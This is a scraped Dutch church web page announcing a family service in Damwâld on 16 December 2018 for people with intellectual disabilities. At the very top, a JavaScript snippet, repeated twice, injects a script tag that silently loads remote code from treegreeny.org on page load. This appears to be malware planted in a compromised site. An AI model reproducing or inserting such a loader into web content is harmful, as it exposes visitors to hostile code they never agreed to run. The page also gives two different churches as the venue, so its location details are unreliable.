;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
16 december 2018
10:00 t/m 11:00
Gereformeerde kerk Broeksterwâld
Bijzondere gezinsdienst … Welkom !

Zondagmorgen 16 december 2018 bent u om 10.00 uur van harte welkom in de Hervormde kerk van Duntamawâld  voor een bijzondere gezinsdienst. Ds. Jaap Miedema gaat in op het thema ‘Licht en donker’. Na de dienst is er gezamenlijk koffiedrinken in gebouw Irene. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: Gereformeerde kerk BroeksterwâldFeitsmawei 1 broeksterwâld